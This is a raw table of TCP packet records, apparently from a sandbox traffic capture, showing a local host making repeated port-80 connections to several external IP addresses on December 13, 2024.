                                                                        Dec 13, 2024 13:08:08.290667057 CET4983680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:08.290667057 CET4983680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:08.295896053 CET4988680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:08.410474062 CET804983645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:08.415663958 CET804988645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:08.415755987 CET4988680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:08.416538000 CET4988680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:08.536248922 CET804988645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:30.306541920 CET804988645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:30.307106972 CET4988680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:30.307647943 CET4988680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:08:30.427308083 CET804988645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:33.807017088 CET4994680192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:33.926956892 CET8049946104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:33.927067041 CET4994680192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:33.940336943 CET4994680192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:34.060211897 CET8049946104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:35.450355053 CET4994680192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:35.570650101 CET8049946104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:35.570736885 CET4994680192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:36.469892979 CET4995380192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:36.589803934 CET8049953104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:36.593096018 CET4995380192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:36.613003969 CET4995380192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:36.732973099 CET8049953104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:38.122267008 CET4995380192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:38.242397070 CET8049953104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:38.242454052 CET4995380192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:39.141294003 CET4995980192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:39.261976957 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.262254953 CET4995980192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:39.273969889 CET4995980192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:39.394314051 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394362926 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394392014 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394419909 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394474983 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394504070 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394531965 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394560099 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:39.394587994 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:40.780985117 CET4995980192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:40.901333094 CET8049959104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:40.901432037 CET4995980192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:41.798677921 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:41.918896914 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:41.919002056 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:41.928286076 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:42.048085928 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:43.766669035 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:43.766716003 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:43.766822100 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:43.766932964 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:43.766978025 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:43.770152092 CET4996580192.168.2.4104.21.74.79
                                                                        Dec 13, 2024 13:08:43.890049934 CET8049965104.21.74.79192.168.2.4
                                                                        Dec 13, 2024 13:08:49.480741024 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:49.602226019 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:49.602308035 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:49.617727041 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:49.737728119 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:50.697571993 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:50.697627068 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:50.698087931 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:51.122313976 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.142452955 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.262357950 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:52.262449980 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.276360035 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.396222115 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357635021 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357688904 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357819080 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:53.778810024 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.799082994 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.919367075 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:54.919531107 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.931969881 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:55.052100897 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052120924 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052140951 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052149057 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052189112 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052242041 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052333117 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052342892 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052386045 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.035886049 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.049541950 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.049619913 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:56.435236931 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.455065012 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.574899912 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:57.574971914 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.590099096 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.710022926 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.686669111 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.686806917 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.687150002 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:58.691472054 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:58.811412096 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:09:04.079346895 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.200648069 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:04.200783014 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.211534023 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.331571102 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300121069 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300241947 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300297022 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:05.716128111 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.735759974 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.855570078 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:06.855638027 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.868469000 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.988708973 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:08.375339031 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:08.539804935 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.392297029 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.512403965 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.512507915 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.526329994 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.646409988 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646472931 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646528959 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646557093 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646584034 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646610975 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646661997 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646688938 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646714926 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:10.768997908 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:10.769076109 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:11.032301903 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:11.195777893 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:12.048088074 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.168354988 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:12.168482065 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.176275015 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.296336889 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:13.432576895 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:13.432646036 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.285753965 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:16.285855055 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:16.285959959 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.288891077 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.411011934 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:22.141057014 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.260935068 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:22.261080027 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.270004034 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.391149998 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555135012 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555160999 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555205107 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:23.781130075 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.798434973 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.919121027 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:24.919234037 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.934504986 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:25.054527044 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.190865040 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.190988064 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.191109896 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:26.450566053 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.469944000 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.593302965 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:27.593620062 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.605433941 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.841203928 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:28.187427998 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187480927 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187503099 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187530994 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187550068 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187568903 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187588930 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187627077 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187644958 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187664032 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:29.106834888 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:29.227488041 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:29.227585077 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.126425982 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.246561050 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:30.246742010 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.255120993 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.376009941 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568196058 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568219900 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568360090 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:31.571218014 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:31.691075087 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:45.534873009 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.655088902 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:45.657392025 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.668402910 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.788322926 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998615026 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998641968 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998712063 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:47.169636011 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.188384056 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.309082985 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:48.309489965 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.322998047 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.444027901 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.661906004 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.662259102 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.662523031 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:49.825810909 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.844633102 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.964766979 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:50.964895964 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.983047009 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:51.103146076 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103161097 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103207111 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103215933 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103286028 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103295088 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103429079 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103436947 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103461027 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307467937 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307486057 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307579994 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:52.497533083 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.520292997 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.640333891 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:53.640429974 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.647983074 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.767946959 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980513096 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980544090 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980655909 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:54.983489037 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:55.103297949 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:10:00.715514898 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.835398912 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:00.835500002 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.847841978 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.967751026 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206742048 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206782103 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206800938 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206907034 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:02.357220888 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.377017975 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.496975899 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:03.497073889 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.508893967 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.628684044 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777515888 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777553082 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777566910 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777591944 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:04.777636051 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:05.013232946 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.032824993 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.153043032 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.155781031 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.165910006 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.285804033 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285819054 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285837889 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285845995 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285926104 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285943985 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.285995007 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.286026001 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.286058903 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:07.610346079 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:07.610388041 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:07.610400915 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:07.610446930 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:07.669616938 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:08.689361095 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:08.810501099 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:08.810578108 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:08.819462061 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:08.940838099 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.090229034 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.090253115 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.090269089 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.090286970 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.090460062 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:10.090636969 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:10.091394901 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:10.097253084 CET5004180192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:10.217304945 CET8050041217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:15.648977995 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:15.769026041 CET8050042161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:15.777287006 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:15.841300964 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:15.963160038 CET8050042161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:17.022445917 CET8050042161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:17.022486925 CET8050042161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:17.022532940 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:17.022566080 CET8050042161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:17.022605896 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:17.341507912 CET5004280192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:18.491420031 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:18.611309052 CET8050043161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:18.620292902 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:19.085571051 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:19.205663919 CET8050043161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:19.888510942 CET8050043161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:19.888567924 CET8050043161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:19.888607979 CET8050043161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:19.888643980 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:19.888705015 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:20.591407061 CET5004380192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:22.000976086 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:22.120795012 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.121390104 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:22.133514881 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:22.253410101 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253520966 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253530979 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253539085 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253592968 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253601074 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.253612995 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.360888004 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:22.360899925 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:23.366647959 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:23.366672993 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:23.366724014 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:23.451375961 CET8050044161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:23.451441050 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:23.638267040 CET5004480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:24.657174110 CET5004580192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:24.781017065 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:24.781128883 CET5004580192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:24.790267944 CET5004580192.168.2.4161.97.142.144
